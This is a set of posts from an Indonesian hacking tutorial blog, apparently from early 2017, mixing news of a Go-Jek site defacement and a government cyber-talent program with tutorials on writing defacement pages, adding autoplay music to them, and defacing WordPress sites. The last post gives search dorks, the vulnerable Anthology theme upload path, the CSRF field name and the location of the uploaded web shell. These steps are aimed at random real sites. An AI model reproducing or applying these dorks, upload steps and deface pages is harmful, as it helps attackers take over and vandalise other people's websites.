Rabu, 08 Februari 2017

Sistem Go-Jek Kembali Di Retas?

HumarTutor - Sistem Go-Jek Kembali Diretas?

Siapa sih yang gak kenal kata Go-Jek? Go-Jek merupakan perusahaan yang melayani layanan ojek secara online. Selain mengantarkan layaknya ojek, Go-Jek juga melayani pengantaran makanan, pembersihan rumah, pengiriman barang, dan lain lain.


Namun baru saja sistem Go-Jek kembali kecolongan. Yang sebelumnya https://staging-gobox-cms.gojek.co.id/ menjadi bulan bulanan para hacker. Namun sekarang tepatnya di domain utama https://gojek.com di retas hacker.

Hacker itu merupakan h3ll_id yang merupakan team dari Gantengers Crew, h3ll_id inilah yang juga meretas keamanan web cnnindonesia.com

Hacker ini menuiskan pesan "dimana kamu lamer? dimana..." serta "hacked by h3ll_id - GantengersCrew" yang merupakan nickname si pelaku serta team asal pelaku.
dan tulisan "be secure your security get down ?? LOL Indonesian h4x0r back! g0j3k got pwnz? :p"

Web yang diretas kali ini beralamat https://gojek.com/back yang di redirect ke http://zonehmirrors.org/defaced/2017/02/07/www.axiapedia.com/www.axiapedia.com/ jika kalian membukanya

Diduga motif si pelaku unutk peretasan adalah Bug Bounty.

Title :

Sistem Go-Jek Kembali Di Retas?

Reviewed by

Humar

On

15.35.00

Rating :

5

Jumat, 03 Februari 2017

Cara Mudah Membuat Script Deface Sendiri



HumarTutor - Cara Mudah Membuat Script Deface Sendiri.
Script deface bisa dibilang sesuatu yang harus dipunyai, karena script ini menjadi tanda. Bisa juga buat unjuk diri. Script bisa dibuat seunik mungkin. Jadi bisa kreasi sendiri tanpa edit punya orang lain.

Bahan :

1. Notepad ++ / Notepad biasa / Text editor lain


Langkah :

1. Buka notepad kalian download

2. Buat tag-tag HTML nya dulu

<html>
<head>
<style>
</style>
</head>
<body>
</body>
</html>

Copy code diatas dan pastekan pada text editor favorit kalian

3. Isi tag nya, contoh

<html>
<head>
<title>HumarTutor.com</title>
<style>
</style>
</head>
<body>
<h1>HACKED BY X.X POISONSQUAD</h1>
</body>
</html>

-- Keterangan :

  • head : di dalam head bisa di isi dengan title , meta , link.
  • style : bisa diisi dengan css untuk mengkreasikan sesuatu yang ada di script
  • body : bisa di isi dengan text dan gambar untuk memperindah script
- Contoh head dengan title dan meta :

<head>
<title>HumarTutor.com</title>
<meta content='X.X PoisonSquad' name='Author'/>
<meta content='Hacked By PoisonSquad' name='description'/>
<meta property="og:image" content="http://s17.postimg.org/lzh74v9n3/image.png">
</head>

-- Keterangan :

  • title : sesuai namanya, judul, ini akan muncul diatas dan bukan pada tampilan script.
  • meta Author : bisa diartikan pembuat script.
  • meta Description : text deskripsi yang akan muncul pada google nanti
  • meta OG Image : gambar thumbnail yang akan muncul saat kalian share di sosial media contoh Facebook, Twitter.

- Contoh style ganti warna background :


<style>
body {
background: #000;
color: #fff;
}
</style>
-- Keterangan contoh diatas :

  • body : artinya adalah kreasi pada bagian body
  • body Background : #000 merupakan hex code untuk warna hitam, artinya warna background pada body akan hitam
  • body Color : #fff merupakan hex code untuk warna putih, artinya warna text yang ada di body nya jadi putih

- Contoh body dengan tulisan di tengah :

<body>
<center>
<h1>HACKED BY X.X</h1>
<font color="red" size="20">humartutor.blogspot.com</font>
</center>
</body>

-- Keterangan :

  • center : membuat tulisan di tengah
  • h1 : tulisan akan menjadi besar (heading), versi lebih kecilnya adalah h2 dan seterusnya
  • font : color="red" artinya tulisan akan berwarna merah, size="20"  artinya tulisan memiliki ukuran 20
jadi jika dirangkai :


<html>
<head>
<title>HumarTutor.com</title>
<meta content='X.X PoisonSquad' name='Author'/>
<meta content='Hacked By PoisonSquad' name='description'/>
<meta property="og:image" content="http://s17.postimg.org/lzh74v9n3/image.png">
<style>
body {
background: #000;
color: #fff;
}
</style>
</head>
<body>
<center>
<h1>HACKED BY X.X</h1>
<font color="red" size="20">humartutor.blogspot.com</font>
</center>
</body>
</html>

Mudah kan? untuk lebih paham dari penjelasan tag tag diatas kalian bisa belajar dari w3school. Disana banyak penjelasan tentang tag tag pada HTML.
Kalau mau lihat punya admin

DISINI atau DISINI

Title :

Cara Mudah Membuat Script Deface Sendiri

Reviewed by

Humar

On

14.28.00

Rating :

5

Kamis, 02 Februari 2017

Kominfo Mencari 100 Mahasiswa Yang Jago Hacking



HumarTutor - Kominfo Cari 100 Mahasiswa Yang Jago Hacking.

Kementrian Komunikasi dan Informatika (Kominfo) mencari bibit bibit baru yang digunakan untuk menangkal serangan cyber di Indonesia. Hal ini disebabkan karena banyak nya peretasan yang terjadi di Indonesia, terutama situs pemerintah dan situs militer jadi ajang para hacker untuk memperkenalkan dirinya, bisa jadi untuk curhat, ataupun melakukan protes.

Program ini dinamai Born to Control yang tercetus saat ID-SIRTI yang mencatat adanya 25 juta peretasan cyber di Indonesia. 25 juta loo, gan.

"Tahun 2015 per hari ada 75 juta serangan dan kebanyakan malware, hal ini tidak bisa didiamkan. Kita perlu mencegahnya secara teknis dan butuh SDM yang mengerti hal teknis." ungkap Rudiantara, Jakarta, Senin (30/1).

"Sebenarnya orang yang ahli di bidang keamanan cyber ada, tapi orangnya itu itu saja" imbuhnya.

Penyaringan tenaga cyber akan membidik 10 ribu peserta di 10 kota berikut :
- Jakarta,
- Medan,
- Palembang,
- Bandung,
- Manado,
- Jogja,
- Denpasar,
- Malang,
- Samarinda, dan
- Makassar

Evan Noor, Chairman Program Born to Control, memastikan saat ini sudah ada kurang lebih 2000 peserta yang mendaftar. Dari target 10 ribu peserta, panitia hanya akan menyeleksi 100 peserta saja.

Dari 100 perserta, akan dipilih kembali 10 peserta terbaik untuk disalurkan ke sejumlah perusahaan atau instasi pemerintah.


Title :

Kominfo Mencari 100 Mahasiswa Yang Jago Hacking

Reviewed by

Humar

On

15.57.00

Rating :

5

Kamis, 26 Januari 2017

Cara Menambahkan Lagu di Script Deface

HumarTutor - Lagu merupakan hal tambahan pada script deface untuk permasalahan ini. Karena dengan lagu bisa menambah ke-keren-an script itu. Kebanyakan script deface tidak memiliki lagu.



Nah, untuk itu disini kita akan belajar bagaimana cara menambahkan lagu pada script deface kita sendiri.

Bahan :

1. Script deface tentunya.

2. Notepad / Notepad++

Langkah :

1. Copy script berikut :

<iframe width="0" height="0" src="//www.youtube.com/embed/lqYQXIt4SpA?rel=0&autoplay=1&loop=1&playlist=60ItHLz5WEA" frameborder="0" allowfullscreen></iframe>


2. Perhatikan kode lqYQXIt4SpA dan 60ItHLz5WEA itu merupakan kode lagu nya, jika ingin mengganti, cari kode lagu youtube yang kamu inginkan.

Lalu, bagaimana cara mencari kode lagu yang diinginkan?
Contohnya :
https://www.youtube.com/watch?v=60ItHLz5WEA : Lagu Alan Walker - Faded

Jadi 60ItHLz5WEA merupakan kode untuk lagu alan walker - faded.

3. Masukkan kode lagu kedalam script diatas dan masukkan ke script deface.

4. Kemudian save script tersebut.

Coba untuk memasang script pada web. Jika sudah terdengar lagu, maka kalian berhasil. Tutorial ini sangat mudah, tapi perlu diperhatikan untuk permasalahan lagu yang tidak muncul.

nb : tidak semua lagu bisa ditambahkan pada script deface, jika kalian mencoba lagu A tidak berhasil cobalah untuk mengganti lagu B dan berhasil, maka permasalahan ada di lagu A yang tidak support.

Title :

Cara Menambahkan Lagu di Script Deface

Reviewed by

Humar

On

16.36.00

Rating :

5

Sabtu, 21 Januari 2017

Cara Deface Wordpress Theme Anthology Vulnerablity File Upload


HumarTutor - Cara Deface Wordpress Theme Anthology Vulnerability File Upload

Yak, sebenernya ini exploit lama, iseng iseng dorking eh... nemu vuln zh, yah share aja di HumarTutor deh
Lansung aja kuy...

Syarat :

1. Shell :

2.. Dork :
inurl:/themes/Anthology/
inurl:wp-content/themes/Anthology/

2. Exploit :
/functions/upload-handler.php

Contoh :
site.com/wp-content/themes/Anthology/functions/upload-handler.php

3. CSRF :
1. Dorking dulu bos q

2. Exploit pake exploit diatas.

Vuln? ada tulisan error.
Ga ada? skip.

3. Selanjutnya eksekusi pake CSRF, terserah mau pake yang apa. Mau gampang ya Pake online.

Online
Tampilan CRF Online

- URL = isi dengan web target.
- POSTFILE = untuk method ini pake "pexetofile" (tanpa kutip)

4. Kalo udah,
Sukses exploit? ada nama file yang lu upload.
Nothing? skip

5. Shell Access

site.com/wp-content/uploads/[yeat]/[month]/namafilenya.waug

EZ kan??


Title :

Cara Deface Wordpress Theme Anthology Vulnerablity File Upload

Reviewed by

Humar

On

22.29.00

Rating :

5